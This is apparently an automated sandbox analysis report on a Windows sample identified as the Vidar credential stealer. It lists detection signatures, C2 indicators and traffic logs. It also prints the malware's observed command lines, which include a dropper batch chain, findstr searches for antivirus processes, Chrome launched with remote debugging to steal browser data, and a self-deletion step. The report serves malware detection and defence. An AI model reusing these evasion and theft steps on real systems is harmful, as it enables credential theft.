Edit tour

Windows Analysis Report
lem.exe

Overview

General Information

Sample name:	lem.exe
Analysis ID:	1575515
MD5:	27b18a5e8bdaa950af93633a821c2bfa
SHA1:	5763fb49a0dcdb77959cf503f008b6f863c1e92d
SHA256:	b9c936992c244ab9864cf92bfe3365f7316b306846a4827aa91740da78dee813
Tags:	exeHUNuser-smica83
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found API chain indicative of sandbox detection

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Suspicious Copy From or To System Directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

lem.exe (PID: 6788 cmdline: "C:\Users\user\Desktop\lem.exe" MD5: 27B18A5E8BDAA950AF93633A821C2BFA)

cmd.exe (PID: 6924 cmdline: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7088 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

findstr.exe (PID: 2256 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 5436 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 1216 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3444 cmdline: cmd /c md 628056 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 7080 cmdline: findstr /V "Cleared" Penalties MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 2916 cmdline: cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Corrections.com (PID: 5496 cmdline: Corrections.com u MD5: 62D09F076E6E0240548C2F837536A46A)

chrome.exe (PID: 4456 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2136,i,3268982340233252329,5354050458271203649,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cmd.exe (PID: 4852 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\628056\Corrections.com" & rd /s /q "C:\ProgramData\2N7Y58YCJW47" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7052 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

choice.exe (PID: 6636 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2823074845.0000000004D99000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Corrections.com PID: 5496	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Corrections.com PID: 5496	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Signatures

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Corrections.com u, ParentImage: C:\Users\user\AppData\Local\Temp\628056\Corrections.com, ParentProcessId: 5496, ParentProcessName: Corrections.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 4456, ProcessName: chrome.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\lem.exe", ParentImage: C:\Users\user\Desktop\lem.exe, ParentProcessId: 6788, ParentProcessName: lem.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd, ProcessId: 6924, ProcessName: cmd.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6924, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 1216, ProcessName: findstr.exe

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T20:47:37.153833+0100	2044247	1	Malware Command and Control Activity Detected	116.203.12.241	443	192.168.2.4	49743	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T20:47:39.457532+0100	2051831	1	Malware Command and Control Activity Detected	116.203.12.241	443	192.168.2.4	49744	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T20:47:34.861412+0100	2049087	1	A Network Trojan was detected	192.168.2.4	49742	116.203.12.241	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 10.2.Corrections.com.4be0000.2.unpack

Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}

Multi AV Scanner detection for submitted file

Source: lem.exe

ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.5% probability

Source: lem.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.12.241:443 -> 192.168.2.4:49740 version: TLS 1.2

Source: lem.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cryptosetup.pdbGCTL source: Corrections.com, 0000000A.00000002.2820141571.00000000045B4000.00000004.00000800.00020000.00000000.sdmp, TR9Z5X.10.dr
Source:	Binary string: cryptosetup.pdb source: Corrections.com, 0000000A.00000002.2820141571.00000000045B4000.00000004.00000800.00020000.00000000.sdmp, TR9Z5X.10.dr

Source: C:\Users\user\Desktop\lem.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,	0_2_00406301
Source: C:\Users\user\Desktop\lem.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0098DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_0098DC54
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0099A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_0099A087
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0099A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_0099A1E2
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0098E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	10_2_0098E472
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0099A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	10_2_0099A570
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_009966DC FindFirstFileW,FindNextFileW,FindClose,	10_2_009966DC
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0095C622 FindFirstFileExW,	10_2_0095C622
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_009973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	10_2_009973D4
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00997333 FindFirstFileW,FindClose,	10_2_00997333
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0098D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_0098D921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\628056\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\628056	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 41MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49742 -> 116.203.12.241:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.12.241:443 -> 192.168.2.4:49744
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.241:443 -> 192.168.2.4:49743

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199807592927

Source: global traffic

HTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 116.203.12.241 116.203.12.241
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 2.20.68.201
Source: unknown	TCP traffic detected without corresponding DNS query: 2.20.68.201
Source: unknown	TCP traffic detected without corresponding DNS query: 152.199.19.74
Source: unknown	TCP traffic detected without corresponding DNS query: 152.199.19.74
Source: unknown	TCP traffic detected without corresponding DNS query: 2.20.68.201
Source: unknown	TCP traffic detected without corresponding DNS query: 2.20.68.201
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_0099D889 InternetReadFile,SetEvent,GetLastError,SetEvent,

10_2_0099D889

Source: global traffic	HTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: sedone.onlineConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chrome.exe, 0000000F.00000003.2122200025.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2122519704.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2122298245.0000413000F58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 0000000F.00000003.2122200025.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2122519704.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2122298245.0000413000F58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;

Source: global traffic	DNS traffic detected: DNS query: pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZ
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: sedone.online
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----7G4WBI5PPH4E3EUS00HDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: sedone.onlineContent-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
